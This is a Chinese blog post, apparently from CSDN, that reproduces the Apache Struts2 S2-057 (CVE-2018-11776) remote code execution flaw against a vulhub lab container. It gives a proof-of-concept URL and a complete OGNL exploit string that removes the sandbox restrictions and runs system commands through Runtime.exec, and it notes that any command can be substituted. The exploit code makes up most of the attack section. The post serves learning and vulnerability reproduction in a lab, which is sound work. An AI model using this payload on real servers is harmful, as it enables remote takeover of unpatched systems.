【漏洞复现】vulhub struts2/s2-057

已于 2023-07-03 00:24:21 修改
阅读量175 收藏 2
点赞数 1
分类专栏: vulhub漏洞复现 文章标签: struts java 后端 网络安全 安全性测试
于 2023-07-03 00:23:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46421742/article/details/131507344
版权

#免责声明:
本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。

本文目录

CVE-2018-11776 s2-057 远程代码执行漏洞

本地环境搭建

漏洞复现

CVE-2018-11776 s2-057 远程代码执行漏洞

本地环境搭建

  • kali靶机

拉取镜像。

 访问http://192.168.61.131:8080/struts2-showcase
 出现以下页面访问证明成功。

漏洞复现

构造POC

http://192.168.1.159:8080/struts2-showcase/${(123+123)}/actionChain1.action

使用bp抓包,发送到重放器,发现123+123被执行246, 可以看到中间数字位置相加正确 , 说明我们中间的表达式正确的执行了 , 那么我们可以构建可以执行系统命令的表达式进行rce。

构造EXP

${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#ct=#request['struts.valueStack'].context).
(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).
(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).
(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('whoami')).
(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

放到bp的编码工具中将EXP进行URL编码。

复制URL编码过后的代码,放进重放器中请求数据包相应位置,点击发送,发现执行whoami并返回结果root。

通过更改.exec(' ')中的命令,实现其他系统命令执行。

docker-compose down
#关闭镜像
docker rmi 镜像ID
#删除镜像
Yang_peach的博客
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Struts2-057远程代码执行漏洞(s2-057)复现
m0_48520508的博客
12-10 885
0x00简介 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。 0x01漏洞概述 漏洞产生于网站配置XML时如果没有设置namespace的值,并且上层动作配置中并
struts-2.5.16-源码+示例(S2-057漏洞演示环境)
08-24
文件包含struts-2.5.16-源码+示例,利用附件文件可以很方便的搭建出调试S2-057漏洞环境,欢迎各位取用
vulhub学习笔记-struts2 S2-057 Remote Code Execution Vulnerablity远程代码执行
ploto_cs的博客
09-11 1687
Struts2 S2-057 Remote Code Execution Vulnerablity远程代码执行 一.漏洞介绍 (一)编号 S2-057 (二)概述 S2-057漏洞产生于网站配置xml的时候,有一个namespace的值,该值并没有做详细的安全过滤导致可以写入到xml上,尤其url标签值也没有做通配符的过滤,导致可以执行远程代码以及系统命令到服务器系统中去 (三)影响版本 Apache Struts 2.3 – Struts 2.3.34 Apache Struts 2.5 – Struts
漏洞复现-Struts2-s2-057&&POC
qq_59350385的博客
05-17 1381
目录 环境搭建 复现工具 复现过程 (1)验证漏洞是否存在 (2)利用已有的POC(exp)复现 POC编写 PoC 编写流程 Poc编写涉及到的一些库 Web漏洞Poc编写基本方法 环境搭建 漏洞部署使用docker,源码下载链接https://github.com/vulhub/vulhub/tree/master/struts2/s2-057 启动环境: docker-compose up -d 访问:http://your-ip:8080/struts2-sho..
S2-057远程代码执行漏洞复现过程
weixin_30371875的博客
08-23 2963
0x01 搭建环境docker https://github.com/vulhub/vulhub/tree/master/struts2/s2-048 docker-compose up -d 0x02 搭建st2-057漏洞环境 docker exec -i -t 88fd8d560155 /bin/bash    后台启动进入docker 根...
structs2最新远程执行漏洞S2-057、反序列化漏洞等修复方案
08-30
Apache Struts2 官方发布了最新的安全公告,披露了一个远程命令执行漏洞漏洞编号:CVE-2018-11776,官方编号:S2-057),攻击者可利用漏洞实施远程命令执行攻击。特给出struct2.0-2.3.35的修复方案
struts2漏洞s2-045,不升级jar版本的修补方法,已验证.docx
07-04
0、这是一个简单、暴力、治根的补漏方法 1、struts2漏洞s2-045,不升级jar版本的修补方法,已验证
Struts2 (S2-016/S2-017)高危漏洞修复文件
04-06
Struts2 (S2-016/S2-017)高危漏洞修复文件
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2 远程代码执行漏洞分析(S2-013) Struts2 是 Apache 官方的产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是 0DAY,官方没有修补方案出现。这个漏洞出现在 includeParams 属性中,允许远程命令...
struts2 最新漏洞 S2-016、S2-017修补方案 .docx
08-01
Struts2 最新漏洞 S2-016、S2-017 修补方案 Struts2 是一个基于 Java 的 Web 应用程序框架,由 Apache 软件基金会维护。最近,Struts2 发生了两个严重的漏洞,分别是 S2-016 和 S2-017,这两个漏洞可能会导致攻击者...
S2-057 任意代码执行漏洞(CVE-2018-11776)
EC_Carrot的博客
08-13 236
漏洞简介 影响版本: <= Struts 2.3.34, Struts 2.5.16 详细请看:https://vulhub.org/#/environments/struts2/s2-057/ 漏洞复现 这次OGNL的解析在url上,我们可以先检验漏洞是否存在: http://your-ip:8080/struts2-showcase/$%7B233*233%7D/actionChain1.action 可以看到访问后已经被执行了,当然在burp上更加能够体现! 先放个POC: ${(#dm=@
Struts2 S2-057远程代码执行漏洞
weixin_46801402的博客
11-01 823
Struts2 S2-057远程代码执行漏洞
S2-057远程代码执行漏洞检测与利用
a1b2c3是弱口令
12-12 2408
Apache wiki更新了一个Struts2的远程代码执行漏洞(S2-057),漏洞威胁等级为高危,漏洞对应的CVE编号为CVE-2018-11776。 定义XML配置时如果没有设置namespace的值,并且上层动作配置中并没有设置或使用通配符namespace时,可能会导致远程代码执行漏洞的发生。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使用通配...
struts2 s2-057漏洞复现
2301_76467680的博客
06-28 85
注:IP地址是自己的虚拟机IP地址。然后虚拟机IP地址加端口访问页面。
S2-057,S2-059,s2-061,s2-062漏洞复现
xiaobai_20190815的博客
04-12 2900
一、漏洞描述 当Struts2的标签属性值引用了action对象的参数值时,便会出现OGNL表达式的二次解析,从而产生RCE风险(S2-059的修复方式为只修复了沙盒绕过并没有修复OGNL表达式执行点,因为这个表达式执行触发条件过于苛刻,导致S2-061再次绕过了S2-059的沙盒) 二、影响版本 s2-057:<=Struts 2.3.34,Struts 2.5.16 s2-059:Struts 2.0.0 - Struts 2.5.20 s2-061:Struts 2.0.0-Strut
struts2漏洞分析(S2-057为例)
hldfight
04-15 2797
0x00 前言 利用空闲时间分析了一下struts2框架的历史高危漏洞,发现除了S2-052(XStream反序列化漏洞)以外,其他漏洞的本质都是由于框架执行了恶意用户传进来的OGNL表达式,从而造成远程代码执行。只不过需要精心构造不同的OGNL代码而已。 发生OGNL表达式注入的点也是多种多样,如:请求参数名、请求参数值、content-type请求头、文件上传时的filename值、url地址...
Struts2-057远程代码执行漏洞预警
煜铭2011
08-22 8861
0x00 前言 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web 应用的开源MVC框架,主要提供两个版本框架产品: Struts 1和Struts 2。 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Cont...
Apache Struts2 S2-057 漏洞POC【内附彩蛋】
大哥一声吼
08-23 7358
前导知识 官网参考链接:https://cwiki.apache.org/confluence/display/WW/S2-057 漏洞影响范围:Struts 2.3 - Struts 2.3.34, Struts 2.5 - Struts 2.5.16 CVE编号:CVE-2018-11776 最重要环节,漏洞POC: https://github.com/TheKingOfD...
Struts2-057远程代码执行漏洞(s2-057/CVE-2018-11776)复现
bamanju0574的博客
08-21 853
参考了大佬的链接:https://github.com/jas502n/St2-057 00x01前言 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web 应用的开源MVC框架,主要提供两个版本框架产品: Struts 1和Struts 2。 Struts2是一个基于MVC设计模式的Web应用框架...
apache struts2框架命令执行漏洞(s2-045、s2-046)
最新发布
01-11
Apache Struts2框架是一种流行的开源Web应用程序开发框架,但曾经发生过多个命令执行漏洞,其中包括s2-045和s2-046漏洞s2-045漏洞源于在处理远程表达式语言(OGNL)时存在安全漏洞,攻击者可以利用构造特定的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Yang_peach的博客

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值